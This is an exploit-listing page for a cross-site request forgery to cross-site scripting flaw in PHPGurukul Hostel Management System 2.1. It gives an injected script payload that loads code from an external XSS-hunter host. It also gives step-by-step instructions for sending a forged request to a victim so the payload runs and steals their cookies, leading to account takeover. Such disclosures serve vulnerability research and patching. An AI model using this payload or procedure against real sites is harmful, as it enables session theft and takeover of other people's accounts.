Phpgurukul hostel management system 2.1 crosssite request forgery (csrf) to crosssite scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-10-28 |
Type : webapps |
Platform : php
This exploit / vulnerability Phpgurukul hostel management system 2.1 crosssite request forgery (csrf) to crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
# Date: 2021-10-27
# Exploit Author: Anubhav Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php
# Tested on Windows 10, XAMPP
Steps to reproduce:
1) Navigate to http://localhost/hostel/hostel/my-profile.php
2) Enter xss payload "><script src=https://anubhav1403.xss.ht></script> in name field
3) Click on Update Profile and intercept the request in Burpsuite
4) Generate a CSRF POC of Update Profile
5) Send this POC to victim
6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires.
7) Now attacker get's the details of victim like ip address, cookies of Victim, etc
8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!!
#POC
https://ibb.co/jVcZxnt
https://ibb.co/DwGh4x9
Phpgurukul hostel management system 2.1 crosssite request forgery (csrf) to crosssite scripting (xss)